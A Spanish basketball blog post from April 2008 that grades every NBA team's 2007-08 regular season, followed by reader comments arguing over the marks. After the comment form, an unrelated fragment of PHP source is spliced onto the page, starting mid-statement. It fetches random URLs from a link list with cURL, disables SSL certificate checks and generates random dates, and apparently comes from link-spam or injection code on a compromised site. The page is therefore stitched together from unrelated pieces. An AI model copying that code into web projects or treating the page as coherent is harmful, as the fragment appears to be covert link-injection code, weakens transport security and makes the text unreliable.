Las notas de la Regular Season

18 de April de 2008 por Gallis

Parece mentira, pero que lejos queda ya el 30 de octubre del año pasado, día en el que Portland y San Antonio abrieron las hostilidades de una nueva temporada en la NBA. Ahora, apenas 24 horas antes de que comiencen los Playoffs, nos disponemos a evaluar, modestamente, el rendimiento de las 30 franquicias tras la disputa de sus correspondientes 82 partidos. 451 jugadores han militado, con más o menos suerte, en las filas de una o más escuadras, todos con la intención de ayudar  a conseguir los objetivos marcados durante la pretemporada. La Regular Season que el miércoles dejamos atrás será recordada en el futuro como una de las mejores de historia: El renacimiento de los Celtics y los Lakers, el hundimiento de los Bulls y los Heat, la salvaje lucha del oeste por entrar en Playoffs (que deja una división, la Southwest, con 4 equipos por encima de 50 victorias y a Golden State fuera con 48) o uno de los meses de febrero más movidos que recordamos. Unas aficiones, como las de New Orleans o Portland, salen reforzadas, mientras que otras, como las de New York o Memphis no aciertan a ver la luz al final del túnel. Aunque ninguna se cambiaría por la de Seattle, una afición que, o mucho cambian las cosas, o se quedará huerfana en los próximos meses. Sea como sea, lo hecho, hecho está, y ahora es tiempo de poner nota al trabajo realizado.

ATLANTIC DIVISION

Boston Celtics (66-16): La temporada de los verdes es, sin duda alguna, magnífica. Desde el primer partido hasta el último han sido el mejor equipo de la competición, consecuencia lógica del gran trabajo realizado en pretemporada. El Big Three celta, Garnett, Pierce y Allen ha rendido a la perfección. Además, otros hombres, como Rondo, Perkins o Powe se han unido a la fiesta sin ningún complejo, en gran parte gracias al trabajo de Doc Rivers. Los Celtics han ganado 42 partidos más que la pasada temporada, lo que supone el mayor incremento de la historia. Pueden volver a jugar una final 22 años después, pero eso es otra historia.

Lo mejor: Todo. Poner una cosa por encima de otra sería desmerecer su temporadón.

Lo peor: Quizá su magnífico año se ha visto deslucido, injustamente, por la batalla del oeste y la debilidad del este.

Nota: Matrícula de Honor.

Toronto Raptors (41-41): La temporada de los canadienses ha ido claramente de más a menos. Durante gran parte del año disfrutaron del cuarto puesto de la conferencia de forma solvente, alcanzando su máximo cuando Calderon asumió la titularidad. La vuelta de TJ Ford fue el desencadenante de un período de indefinición que acabó con Calderon en el banco, con Bosh admitiendo que no confiaba en sus compañeros y con el séptimo puesto demasiado cerca.

Lo mejor: La temporada de Calderón, que le hizo estar en las quinielas para ir al Allstar y que le convierte en un agente libre muy codiciado.

Lo peor: En los 2 últimos meses se ha visto que el equipo no tiene muy claro hacía donde va.

Nota: Suficiente.

Philadelphia 76ers (40-42): La época Post Iverson no ha sido tan traumática como se esperaba en la ciudad del amor fraternal y es que la temporada de los Sixers ha estado sin duda por encima de todas las expectativas. El equipo tardó en despertar lo que le costó despertar a Andre Miller y a partir de ahí la cosa comenzó a funcionar. En los últimos meses han sido capaces de ganar a más de un gallito de la competición. Muy pocos les daban en las quinielas por entrar en los Playoffs, y ahí están.

Lo mejor: Renovar a Maurice Cheeks a mitad de temporada. El trabajo del ex base de los Sixers avala dicha decisión.

Lo peor: De momento no parece que puedan llegar más allá, aunque tienen margen para mejorar.

Nota: Bien.

New Jersey Nets (34-48): Es fácil pensar que en los 2 primeros meses, conforme veían la evolución de Bynum en LA, en las oficinas de los Nets se lamentaban cada vez más de que aquel Kidd x Bynum no se llevara a cabo. La renovación de Carter el pasado verano fue una huída hacía adelante y aunque durante mucho tiempo estuvieron en Playoffs, el traspaso de Kidd fue el final anunciado de un proyecto que ya languidecía demasiado tiempo. A nadie pilla por sorpresa que ya estén de vacaciones.

Lo mejor: Haberse dado cuenta de que el otrora mejor Big Three del este no les llevaba a ningún sitio.

Lo peor: Los rumores de su marcha a Brooklin son cada vez más insistentes. Aunque quizá en este caso no sea tan malo…

Nota: Insuficiente.

New York Knicks (23-59): Hay un montón de cosas malas que se pueden decir sobre la temporada que han realizado los Knicks, pero lo peor, lo más triste, sin duda, es que se veía venir. De ahí que sin ni siquiera acabar la temporada, Isiah Thomas perdió su cargo de presidente en favor de Donnie Walsh y nadie da un duro por su continuidad en el banquillo. Este año los Knicks han aumentado su carga salarial, han demostrado ser más indisciplinados e incapaces de jugar en equipo.

Lo mejor: Que el año ha acabado. Y, algo es algo, no han perdido 60 partidos.

Lo peor: Thomas, Isiah Thomas.

Nota: Muy deficiente.

CENTRAL DIVISION

Detroit Pistons (59-23): Los Pistons son desde hace varias temporadas una máquina perfectamente engrasada y aunque cada año cambian alguna pieza, el engranaje no se resiente. Sin hacer nada del otro jueves, o al menos dando esa impresión, son el segundo mejor equipo de la temporada. Sus jugadores principales son un año más viejos, pero varios de los jóvenes están dando un paso adelante. Su único debe seas quizá que no han dado toda la guerra esperada a los Celtics.

Lo mejor: Siguen siendo los Pistons.

Lo peor: Lo dicho. Nos hubiera gustado mayor competición por el número 1 del este.

Nota: Notable (alto). 

Cleveland Cavaliers (45-37): Los finalistas del este no han dado de sí todo lo que deberían. Parece claro que a 82 partidos, todavía quedan lejos de Boston y Detroit, pero en lugar de luchar por el tercer puesto con Orlando, apenas han podido mantener el cuarto frente a un equipo, los Wizards, plagado de lesiones importantes. El megatrade realizado en febrero dió más armas a Lebron James, pero de momento no parece haber terminado de cuajar.

Lo mejor: Lebron James sigue dando la sensación de que no tiene límites.

Lo peor: Un finalista de la NBA que aspira a volver a serlo debe dar una mejor impresión.

Nota: Bien.

Indiana Pacers (36-46): La marcha de Donnie Walsh a los Knicks pone punto y final a una larga (y en ocasiones muy exitosa) trayectoria de los Pacers. Pero el último estertor no ha sido del todo positivo, pese a que los Playoffs no han quedado tan lejos. La temporada ha estado marcado por las largas ausencias de Maine y de Tinsley. En esta tesitura, Dunleavy dió el paso adelante que debería haber dado Danny Granger. No parece suficiente para una afición tan exigente. 

Lo mejor: Sangre “nueva” en los despachos. Larry Bird tendrá ahora todo el poder sobre el futuro de los Pacers.

Lo peor: Las continuas lesiones de Maine no le permiten ayudar y, además, rebajan su valor ante un posible trade.

Nota: Insuficiente.

Chicago Bulls (33-49): Lo de Chicago de esta temporada podría calificarse como un Expediente X. Los Bulls se presentaban como los más serios aspirantes a desafiar al poder establecido (Boston y Detroit) y sin que nadie lo viera venir, el proyecto de los Baby Bulls se ha derrumbado como un castillo de naipes. Lesiones, bajísimos rendimientos, actos de indisciplina… No hay gran cosa que los aficionados de Chicago se puedan llevar a la boca en un año en el que se hablaba de anillo. el traspaso con Cleveland es el reconocimiento tácito de que el fichaje de Ben Wallace fue un error.

Lo mejor: Peor es difícil que salgan las cosas. No es consuelo, pero vaya…

Lo peor: Más de uno sigue dándose cabezazos contra la pared viendo a Gasol en LA.

Nota: Muy deficiente.

Milwaukee Bucks (26-56): Como cada año, Millwaukee parte en el mes de octubre con un equipo que, sobre el papel, debería clasificarse para los Playoffs. Y como cada año, se han vuelto a quedar fuera. Muchas son las teorías sobre lo que les ocurre, pero el caso es que lo de los Bucks parece que no tiene arreglo. A lo largo del año han dado demasiadas muestras de ser un equipo muy blandito. La presión sobre la supuesta titularidad obligada de Li Jianlian no ha ayudado al crecimiento de un grupo que no da la sensación de ser un equipo.

Lo mejor: Siguen teniendo mucha calidad, para traspasar o esperar que explote de una vez.

Lo peor: A Redd se le empiezan a acabar las oportunidades para demostrar que es un jugador franquicia.

Nota: Insuficiente.

SOUTHEAST DIVISION

Orlando Magic (52-30): En pretemporada los Magic decidieron apostar por Lewis, dándole lo que para muchos fue una millonada inmerecida. El objetivo era conseguir que, junto a Dwight Howard, ambos formaran un duo dominador en la liga. Y Orlando tiene por fin su duo, pero gracias a la resurreción de Hedo Turkoglu. Pese a que otros equipos tienen mejor plantilla sobre el papel, han defendido su tercera plaza en el este con mucha solvencia.

Lo mejor: La temporada del turco es fantástica. Si consiguen que se mantenga y vuelve la mejor versión de Lewis, hay mucho equipo.

Lo peor: Howard está demasiado solo dentro. Y no tienen un base titular claro y fiable.

Nota: Notable.

Washington Wizards (43-39): Un año más las lesiones han castigo en exceso a los capitalinos. Sin embargo, este año no ha sido en los Playoffs, a los que llegan más o menos sanos, sino durante la Regular Season. Arenas se ha perdido prácticamente todo el año y pese a ello, a punto han estado de quedar cuartos. Butler, mientras se lo permitió su cadera y Jamison se echaron el equipo a la espalda y el resultado es para estar satisfecho. Ojo! les han ganado 3 veces a los Celtics.

Lo mejor: Como ya hemos comentado, este año llegan sanos a los Playoffs. Y han demostrado ser competitivos sin Arenas.

Lo peor: Stevenson dijo que Lebron James estaba sobrevalorado. Éso, y vivir del baloncesto debería ser incompatible.

Nota: Notable.  

Atlanta Hawks (37-45): Después de varios años oyendo aquello de que llegan los Hawks, por fin lo han conseguido. La llegada de Bibby y la marcha de Kidd fueron 2 factores claves para que Atlanta no esté ya de vacaciones. Los años eligiendo muy alto en el draft empiezan a dar de sí. Los jóvenes empiezan a aclimatarse a la liga y junto a hombres como Bibby y Joe Johnson el equipo ha empezado a tomar forma en esta Regular Season. Sin embargo, no han dado todo lo que se esperaba de ellos.

Lo mejor: Al Horford les da, por fin, una presencia interior de mucha calidad.

Lo peor:  Da la sensación de que se han clasificado para Playoffs porque no había nadie más.

Nota: Suficiente.

Charlotte Bobcats (32-50): Con los Bobcats ha pasado más o menos lo mismo que con los Bucks. Sobre el papel, en octubre parecían un equipo de Playoff, sin embargo desde el principio se vió claro que éste tampoco era su año. Las lesiones les han castigado, pero no mucho más que a otros equipos. Felton se ha quedado varios pasos detrás de otros bases de su generación y lo mismo ocurre con Okafor. Richardson solo ha sido el líder esperado en Charlotte en los partidos contra los Warriors.

Lo mejor: Han demostrado ser un equipo con calidad, por lo que hay margen de mejora.

Lo peor: No tienen un líder capaz de aglutinar al equipo y dotarles de su bien más escaso: ambición.

Nota: Insuficiente.

Miami Heat (15-67): Pese a que al comienzo de la temporada los Heat no partían en el grupo de favoritos, muy pocos, por no decir nadie, podrían haberse imaginado el grado de descomposición al que ha llegado el campeón de 2006. Wade comenzó lesionado y, visto el percal, tardó poco en borrarse y empezar a pensar en Pekín. Shaq se marchó y llegó Marion, encantado de la vida por cambiar al entonces líder del oeste por ésto. Poco a poco, los titulares se fueron borrando, hasta que los Heat se convirtieron en un equipo de la D-League. Mientras, Riley se perdió varios partidos para ir a ver jugadores universitarios. Afortunadamente, se acabó.

Lo mejor: Riley fue incluido en el Hall of Fame…¿cuela?

Lo peor: Todo.

Nota: Muy, muy deficiente.

NORTHWEST DIVISION

Utah Jazz (54-28): Los Jazz han sido este año un equipo tan temible en casa como irregular fuera del Delta Center. Deron Williams y Carlos Boozer han sido un año más los referentes de los chicos dirigidos, como no, por Jerry Sloan. Kirilenko continúa en el equipo, pese a sus demandas de trade de este verano y junto a Okur, Korver, Millsap o Brewer han formado una intendencia tan regular como el rendimiento del equipo. Cuartos del oeste (séptimos si tenemos en cuenta solo las victorias), no han tenido problemas para vencer su división.

Lo mejor: Deron Williams sigue creciendo en un equipo que cada año es, precisamente eso, más equipo.

Lo peor: Los Jazz bajan muchos enteros fuera de Utah.

Nota: Bien (alto).

Denver Nuggetts (50-32): Los Nuggetts han acabado la temporada con 50 victorias y además, cuentan en sus filas con 2 de los 4 mejores anotadores de la liga, Iverson y Carmelo. Sin embargo, los de George Karl han sufrido mucho más de los esperado para garantizar su pase a los Playoffs. En ataque dependen demasiado de sus individualidades y en defensa… bueno, apenas defienden. La última salida de tono de Melo ha puesto un borrón a una temporada buena, a secas.

Lo mejor: Cuando quieren, Iverson y Carmelo son imparables.

Lo peor: Cuando no están, son un equipo más vulgar de lo que debería.

Nota: bien (bajo).

Portland Trail Blazers (41-41): Los Blazers pasaron de tirar la temporada en octubre, cuando se supo que Oden no jugaría ni un minuto este año, a ser el equipo de moda en el mes de enero. Al final, ni tanto ni tan calvo. No han sido capaces de clasificarse para los Playoffs, pero la sensación que ha dejado el equipo ha sido muy positiva. Roy ha dado un paso adelante y gente como LaMarcus o Travis Outlaw le han seguido. si vuelven a tener suerte en el draft y Rudy da el salto, el año que viene su nota puede (y debe) ser más alta.

Lo mejor: Los tiempos de los JailBlazers han quedado atrás. El presente es bueno y el futuro esperanzador.

Lo peor: La escasísima presencia de Sergio Rodríguez, que probablemente le costará el no ir a los Juegos olímpicos.

Nota: Bien.

Minnesota Timberwolves (22-60): El año I después de Garnett ha salido en Minny exactamente como esperaban. El equipo no ha tenido ninguna oportunidad de luchar por nada y deberá esperar al draft para calificar la temporada. Eso sí, Jefferson ha seguido creciendo y si se le rodea bien, ha dado muestras de ser un superclase. Otros como McCants también han dado un pequeño paso adelante. Lástima que Foye haya perdido todo el año prácticamente.

Lo mejor: Jefferson parece una buena base para construir algo, pero como demuestra el ejemplo Garnett, él solo no será suficiente.

Lo peor: Si no se dan prisa, Jefferson podría cansarse de esperar.

Nota: Insuficiente.

Seattle Supersonics (20-62): la temporada de los Sonics está marcada por 2 factores: Kevin Durant y Oklahoma City. El rookie ha tenido un buen año y ha demostrado que es una gran base para construir un equipo de futuro. Ha alternado actuaciones memorables con partidos muy flojos. Nada insólito en un novato. Habrá que ver donde disfrutan de su evolución, porque todo parece indicar que Seattle ha vivido esta semana su último partido NBA, quién sabe por cuanto tiempo.

Lo mejor: Kevin Durant ha demostrado porque había quienes le ponían al nivel de Oden en la elección del draft del año pasado.

Lo peor:Si los Sonics dejan Seattle, será la peor noticia en muchos años.

Nota: Insuficiente.

PACIFIC DIVISION

Los Angeles Lakers (57-25): Lo que cambian las cosas. Los ecos de la petición de traspaso de Kobe del pasado verano son apenas un vago recuerdo para los aficionados de LA. La progresión de Bynum, el “atraco” de Gasol, el despertar de Odom  y así un largo etcetera han hecho que un equipo que a duras penas tenía esperanzas para entrar en Playoffs, acabe primero del Salvaje Oeste. La única pena es que no han podido juntar en ningún momento su cuarteto mágico en la pista. 

Lo mejor: Conseguir la primera plaza del oeste y la llegada “gratis” de Gasol. Eso, y que Kobe ni se acuerda de los Bulls.

Lo peor: Las lesiones de Ariza y, sobre todo de Bynum.

Nota: Sobresaliente.

Phoenix Suns (55-27): Los Suns han apostado este año por darle menos importancia a la Regular Season, en favor de los Playoffs, aunque eso les costara sacrificar su estilo de juego. Así se explica el trade que realizaron con los Heat, gracias al cual Shaq aterrizó en el estado de Arizona. Cuando Twister llegó, los Suns eran primeros del oeste y le sacaban más de 3 partidos a los Lakers. El período de adaptación les ha costado acabar sextos, pero a cambio acaban con un Shaq motivado, un Amare pletórico y un Nash encantado de la vida.

Lo mejor: Decidieron apostar por conseguir un anti Duncan… y de momento no se arrepienten.

Lo peor: Minimizar la Regular Season les ha costado el factor cancha en Playoffs.

Nota: Notable (bajo).

Golden State Warriors (48-34): Fueron sin duda los grandes damnificados del mes de febrero. La cadena de traspasos comenzó una espectacular carrera por los Playoffs y los de Don Nelson llegaron a la recta final con la lengua fuera. Además, su clasificación para Playoffs pasó de ser una agradable sorpresa a una obligación y eso se notó en algunas muñecas. Pese a todo, han estado muy cerca de las 50 victorias y han ganado más partidos que el año pasado. Sus partidos han sido de obligado visionado.

Lo mejor: Quizá sea el hecho de ser padre, pero la temporada de Stephen Jackson ha sido modélica. Y a Davis y Ellis da gusto verles jugar.

Lo peor: La fórmula parece muy justa para competir en esta locura de conferencia.

Nota: Bien.

Sacramento Kings (38-44): Poco o nada se esperaba en Sacramento de esta temporada, y los chicos de Reggie Theus han dado mucho de sí. Desde luego, están muy lejos de poder luchar por los Playoffs, pero el camino parece el adecuado. Con la marcha de Bibby a Atlanta, se fue el último representante de aquellos fantásticos Kings de principios de década. En la recta final, han sido jueces en la resolución del Wild Wild West.

Lo mejor: El trabajo de Reggie Theus no es merecedor del premio de entrenador del año, pero es digno de mención.

Lo peor: En Sacramento le han cogido el gusto a eso de ganar, y esto les debe saber a muy poco.

Nota: Suficiente.

Los Angeles Clippers (23-59): La lesión de Elton Brand acabó, antes de comenzar, con cualquier mínima esperanza de los Clippers para sacar algo en claro de esta temporada. Aún así, hay conclusiones positivas que se pueden extraer. Kaman está preparado para ser un buen pívot de la liga y Thorton será un jugador importante en el futuro de la franquicia. Pero vamos, la mejor noticia del año para los hermanos pobres de LA ha sido la vuelta de Brand a las canchas.

Lo mejor: La vuelta de Brand y la evolución de Chris Kaman.

Lo peor: Otro año más sin objetivos en los Clippers…y van…

Nota: Insuficiente.

SOUTHWEST DIVISION

New Orleans Hornets (56-26): Sin duda, la mayor sorpresa de la Regular Season, positivamente hablando. Quién más, quién menos, todos esperaban un buen año de los Hornets, pero la realidad ha superado todas las previsiones. Paul se ha confirmado como un TOP 5 de la liga, ha vuelto el Pedja de los Kings y West y Chandler han demostrado ser un juego interior demoledor. De la mano de Byron Scott han disputado el número 1 hasta el final, momento en el que la inexperiencia les ha jugado una mala pasada.

Lo mejor: Por encima de todo, el temporadon de Chris Paul. Solo el disputarle el MVP a Kobe es sensacional, y ése es el menor de sus logros.

Lo Peor: En la última semana han sembrado algunas dudas sobre los Playoffs.

Nota: Sobresaliente.

San Antonio Spurs (56-26): Un año más, los Spurs siguen a lo suyo. Pese a las lesiones y la baja forma, a lo que hay que sumar que la edad no perdona, se las han ingeniado para ganar 56 partidos y demostrarle a todo el mundo que siguen siendo favoritos de pleno derecho. El trio Parker-Manu-Duncan ha dado sobradas muestras de su solvencia. quizá esta temporada haya flojeado su banquillo, pero aún así sigue siendo un equipo muy de fiar.

Lo mejor: Sin hacer nada espectacular, están al nivel de los mejores. Y llega su momento.

Lo peor: Es año par. Y todos sabemos lo que eso significa…

Nota: Notable (alto).

Houston Rockets (55-27): El otro gran Expediente X de la liga. Comenzaron flojos, pese a ser favoritos en todas las quinielas. Cuando Adelman terminó de ajustar el equipo, se lesionó Yao y aún así, T-Mac, Alston (que se olvidó del Playground y se convirtió, por fin, en un jugador NBA) y compañia se las ingeniaron para ganar 22 partidos seguidos, la segunda mejor racha de la historia. La teoría decía que debían flojear, pero no fue así. Pudieron ser primeros hasta las 2 últimas jornadas. 2 novatos, Luis Scola y Carl Landry, han tenido mucho que ver en la gran Regular Season de los Rockets.

Lo mejor: ¿Qué mejor que ganar 22 partidos seguidos?

Lo peor: Pensar donde se podría haber llegado con Yao en perfectas condiciones.

Nota: Matrícula de Honor.

Dallas Mavericks (51-31): Junto a Phoenix y San Antonio, los Mavs afrontaban la temporada como claros favoritos, pese a su batacazo en los Playoffs del año pasado contra Golden State. Sin embargo, pronto se vió que el equipo a duras penas lo había superado y Cuban (Nowitzki mediante) pensó que Kidd era lo que un médico recetaría al equipo. Su adaptación ha sido demasiado lenta. A falta de ver el resultado en Playoff, la cosa no ha funcionado, solo así se explica esa séptima posición.

Lo mejor: La milagrosa recuperación de Nowitzki ha hecho que el mejor momento de Dallas en Regular Season haya sido el momento que más importa.

Lo peor: Da la sensación de que este proyecto está ante su última temporada.

Nota: Suficiente.

Memphis Grizzlies (22-60): La temporada de los ositos es, cuando menos, embarazosa. Y lo es por 2 motivos. Comparte división con 4 equipos por encima de 50 victorias y siempre será recordado por el ¿trade? que llevó a Gasol a los Lakers. El equipo se dejó llevar durante todo el año, pero desde febrero lo hizo de una forma exagerada, para deleite de un Gay encantado de la vida de tener todo el equipo para él y desesperación de un Miller ansioso por salir de ahí.

Lo mejor: Gasol se fue, por fin y mientras, Navarro ha demostrado tener un sitio en la NBA.

Lo peor: visto lo visto, ¿Quién va a querer fichar por Memphis?

Nota: Muy deficiente.

Comenta

9 comentarios a esta entrada

  1. txusma dice:
    #1

    Tremendisimo análisis, Gallis!!

      Citar

  2. MagicJohnson32 dice:
    #2

    ¡¡Qué animal, socio, qué animal!!

    El análisis es demasiado bueno, porque no nos dejas nada por decir 😀

      Citar

  3. Jabho dice:
    #3

    Pues si, lo cierto es que poca cosa para discrepar. Por sacar algún matiz diria que Indiana suficiente. No tenian equipo para mas y menos con las remoras que tiene en Jamaal y Jermaine. Por otra parte Atlanta con record negativo me parece de suspenso a pesar de sus PO.

    En el Oeste diria que los Jazz no dan la sensación de haber crecido y eso les bajaria mi nota. Dallas ha ganado unos 15 partidos menos, creo, que el año pasado. Llega mejor a los PO pero ha estado a punto de no clasificarse y tiene el factor en cancha en contra todas las eliminatorias. Para mi Dallas suspende.

    De acuerdo que los vencedores morales son Boston, LAL, Rockets y NO. Spurs y Detroit o incluso Suns han jugado la regular midiendose, seguros de si mismos y sabiendo que tenia una importancia relativa sobre todo si confias en tus posibilidades. Esperanzas en Philadelphia, Washington o Porland. Algo más grises de lo esperado Orlando, Cleveland, Utah o Denver.

      Citar

  4. TheDeerHunter dice:
    #4

    Qué análisis… crack: matrícula para tí también

    En general estoy de acuerdo en TODO.

    Algún matiz que yo cambiaría:

    -Toronto: En mi opinión es más insuficiente que suficiente. No han cumplido sus propios objetivos (quedar entre los 4 primeros, o 50 victorias, lo que queráis) En realidad, la idea con una buena plantilla como esta era crecer. No sólo no lo han conseguido, sino que han roto algo de lo bueno que habían tenido siempre, su unión como equipo. Mas aún, su trayectoria ascendente de los últimos años se ha cortado este año. De un equipo con ideas claras e identidad propia han pasado a ser una panda de pollos sin cabeza (ejemplo claro TJ “nomellegalasangre al celebro”)
    La palmatoria en primera ronda certificará su fracaso. (mucho tienen que cambiar las cosas para que no sea así. Y ÓJALA ME EQUIVOQUE)

    -Detroit: Para mí sobresaliente… aunque seguro que Gallis también se ha planteado seriamente ponérselo.

    -Milwaukee: Les cambiaría la nota a muy deficiente. No es que se hayan quedado lejos de las expectativas… es que da la sensación de que ni siquiera las tienen. Lo mismo les da quedar fuera de playoffs que que les capen al perro… Y no son un mal equipo sobre el papel.

    -Utah: Para mí, notable a pesar de todo. He visto cosas en su juego que me parecen de equipo peligrosísimo. Al final se ha dejado llevar un poco, pero es normal debido a la falta de motivación en esos momentos tan complicados para los demás. Tampoco veo mal que en su situación hayan reservado fuerzas un poco mal. Les vendrán bien.

    -Denver: Como con Detroit, me quedo con la otra parte de la balanza. Suficiente y punto. No me han transmitido nada… más bien todo lo contrario. Pienso que son peligrosísimos en playoffs pero su temporada regular ha sido bastante decepcionante (sobre todo por juego que transmita garantías)

    -Portland suficiente también. Engancharon una buena racha de juego y han mostrado buenos mimbres. Pero la buena racha se demostró que era un espejismo y no han conseguido absolutamente nada. Desconfío de la cerrazón intelectual, lo siento. (me refiero a McMillan of course… aquí Koeman no tiene nada que ver, que conste)

    -Lakers: Faltaría mencionar alguna duda que otra que ha surgido de su carácter ganador y de su defensa como aspectos negativos. No obstante, el sobresaliente lo merecen, sin duda.

    -Golden State. Con todo el dolor de mi corazón únicamente puedo pensar en insuficiente. Lo único que me viene a la cabeza es DECEPCIÓN. En realidad no han logrado lo que esperaban. Han peleado fuerte, han jugado bien… pero no lo han logrado y se han hecho caquitas en el peor momento. Hay jugadores que les falta carácter y ¿porqué los entrenadores a veces son tan cerriles???? no me lo esperaba de él. De otros sí, pero no de él.
    I believe in Baron Davis. Qué puto crack.

    -Houston. La matrícula me parece completamente injusta. No creo que se puedan comparar con Boston en prácticamente nada. Puede que admitiera el sobresaliente pero no debemos olvidar la primera parte de temporada con el equipo completo. No han sido determinantes… y sinceramente, muy pocos darían un duro por ellos ahora mismo.
    Eso no quita que han hecho una temporada cojonuda y sobre todo sin Yao y el haberse repuesto a ese mazazo.

    -Dallas. No sé si será que me condicionan los últimos partidos que he visto de ellos . Les pondría un bien. Es cierto que no han cumplido con las expectativas, pero tampoco es menos cierto que se han repuesto de circunstancias muy difíciles, empezando por el tropezón del año pasado que podría haber desintegrado cualquier equipo. Se empieza a comprobar que kidd quizá no ha sido tan mala idea como pensábamos todos. Muchos analistas les dan como favoritos contra NO. Eso lo resume todo.

    Lo dicho Gallis. Gran análisis.

      Citar

  5. Viva_Dirk dice:
    #5

    También coincido en la mayoría con lo dicho por Gallis y los apuntes que habeis hecho. Yo destacaría 2 equipos:

    Washington: Yo les daría un sobresaliente, han estado 66 partidos sin Arenas y 24 sin Butler y aun así han acabado quintos, le han ganado 2 veces a Boston(los primeros en el Garden) y parecen llegar el un gran momento a play-offs.

    Philadelphia: Un notable por convertir una supuesta temporada de transición en una temporada ilusionante para sus aficionados. Finalmente han sido 7ºs y lo tendrán casi imposible contra Detroit, pero este año han hecho todo lo que tenian que hacer: Iguodala y Miller como líderes, Dalembert sintiendose importante y dando oportunidades a todos sus jóvenes.

      Citar

  6. duncan21 dice:
    #6

    hola, enhorabuena por el artículo, muy completo, lo que sabeís de NBA me sorprende cada día mas. Por cierto, el otro día leí (no se si fué aqui) que Darius Miles lo dejaba definitivamente. Si Portland puede liberar su salario, cuanto tienen para fichar agentes libres este verano? si a esto le sumamos la vuelta de Oden, la progresión de Aldridge y Outlaw, a Roy y a Rudy (cual creeís que va a ser su papel?) no creeís que en pocos años este equipo puede llegar a ser candidato a todo?
    un saludo

      Citar

  7. Viva_Dirk dice:
    #7

    Buenas Duncan, lo primero darte las gracias por seguir el blog y participar.

    En cuanto a tu pregunta, la respuesta sin duda es si. No se como estará el tema con Miles, seguramente su salario les seguirá contando en el límite salarial. De todos modos, en el verano de 2009 liberan los contratos de Lafrentz y Francis, que suman 30 millones de dólares, ahí es cuando en teoría irán a por un base de gran nivel, ese verano son agentes libres por ejemplo Baron Davis o Andre Miller, y aun dandoles el máximo, les quedaría dinero para posiblemente un alero, Lamar Odom o Hedo Turkoglu podrian ser dos nombres a barajar.

    El papel de Rudy, va a ir muy unido a lo que suceda con el puesto de base. Si esperan al verano de 2009 para intentar la contratación de uno, seguramente Brandon Roy jugará minutos como director de juego y eso permitirá a Rudy tener mas minutos. Si intentan algun traspaso, que sería una error en mi opinión, habría que ver como queda configurada la plantilla. Eso si, pase lo que pase, parece que Rudy va a tener un papel de jugador de rotación en su primer año, que juegue 12 o 20 minutos dependerá de que movimientos hagan durante el verano.

      Citar

  8. Gallis dice:
    #8

    Gracias a todos! sobre todo por leerlo. cuando terminé y lo ví publicado pensé que nadie lo leería entero, jojojojo…

    A ver si mañana tengo un rato y comento algo…

      Citar

  9. Dantley dice:
    #9

    Enterito, pedazo de artículo ¡¡¡

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>